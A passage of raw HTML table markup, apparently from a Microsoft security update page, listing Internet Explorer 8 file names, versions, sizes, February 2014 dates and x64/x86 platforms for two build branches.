class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,538,560</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,539,072</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.19507</td><td class=\"sbody-td\">23,040</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">23,040</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">31,744</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,147,392</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">31,744</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,151,488</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.19507</td><td class=\"sbody-td\">459,776</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23569</td><td class=\"sbody-td\">459,776</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">252,416</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">252,928</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">56,832</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">56,832</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,019,904</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,019,904</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">742,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">742,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">12,288</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:58</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:32</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">12,288</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.19507</td><td class=\"sbody-td\">479,232</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:11</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23569</td><td class=\"sbody-td\">479,232</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:26</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">98,304</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">98,304</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">9,347,072</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:58</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">9,349,632</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">718,848</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">718,848</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">301,056</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">301,056</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">162,816</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:58</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">660,648</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:00</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">162,816</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">660,648</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:54</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">502,272</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">502,272</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">00:59</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">243,712</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">20-Apr-2012</td><td class=\"sbody-td\">01:31</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">243,712</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">2,357,760</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.19507</td><td class=\"sbody-td\">165,888</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">2,358,272</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.23569</td><td class=\"sbody-td\">165,888</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:58</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">72,192</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">77,312</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">72,192</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">77,312</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,028,096</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,028,096</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">12,510,208</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">219,136</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">12,511,232</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">219,136</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">19:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:58</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:13</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:45</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,213,440</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,216,000</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.19507</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.19507</td><td class=\"sbody-td\">916,992</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Feb-2014</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=
